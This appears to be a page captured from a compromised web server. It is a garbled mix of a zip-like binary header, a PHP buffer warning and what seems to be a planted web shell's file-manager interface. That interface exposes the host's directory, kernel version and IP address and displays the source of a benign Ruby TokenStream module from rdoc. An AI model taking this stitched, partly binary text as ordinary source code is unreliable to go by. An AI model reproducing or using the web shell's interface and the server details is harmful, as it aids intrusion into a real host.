PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
Notice: ob_end_clean(): Failed to delete buffer. No buffer to delete in /home/telusvwg/public_html/da754d/index.php on line 8
$#$#$#

Dir : /opt/alt/ruby18/lib64/ruby/1.8/rdoc/
Server: Linux premium279.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
IP: 66.29.132.192
Choose File :

Url:
Dir : //opt/alt/ruby18/lib64/ruby/1.8/rdoc/tokenstream.rb

# A TokenStream is a list of tokens, gathered during the parse
# of some entity (say a method). Entities populate these streams
# by being registered with the lexer. Any class can collect tokens
# by including TokenStream. From the outside, you use such an object
# by calling the start_collecting_tokens method, followed by calls
# to add_token and pop_token

module TokenStream
  def token_stream
    @token_stream
  end

  def start_collecting_tokens
    @token_stream = []
  end
  def add_token(tk)
    @token_stream << tk
  end
  def add_tokens(tks)
    tks.each  {|tk| add_token(tk)}
  end
  def pop_token
    @token_stream.pop
  end
end